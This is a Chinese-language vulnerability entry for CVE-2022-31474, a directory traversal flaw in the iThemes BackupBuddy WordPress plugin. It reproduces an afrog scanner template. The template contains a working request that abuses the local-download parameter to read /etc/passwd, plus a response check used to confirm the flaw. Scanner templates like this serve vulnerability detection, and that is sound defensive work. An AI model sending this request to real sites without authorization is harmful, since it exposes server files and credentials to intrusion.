CVE-2022-31474: CVE-2022-31474

日期: 2025-08-01 | 影响软件: CVE-2022-31474 | POC: 已公开

漏洞描述

iThemes BackupBuddy 插件 8.5.8.0 - 8.7.4.1 版本中的目录遍历漏洞。

PoC代码[已公开]

id: CVE-2022-31474

info:
  name: CVE-2022-31474
  author: zhizhuo
  severity: high
  verified: true
  description: |-
    iThemes BackupBuddy 插件 8.5.8.0 - 8.7.4.1 版本中的目录遍历漏洞。
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31474
  tags: cve,cve2022,ithemes,backupbuddy,directorytraversal,traversal,rce
  created: 2023/06/23

rules:
  verify:
    request:
      method: GET
      path: /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=wp-config&local-download=/etc/passwd
    expression: response.status == 200 && response.body.bcontains(b'/bin/bash') && response.body.bcontains(b'root')
expression: verify()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-31474.yaml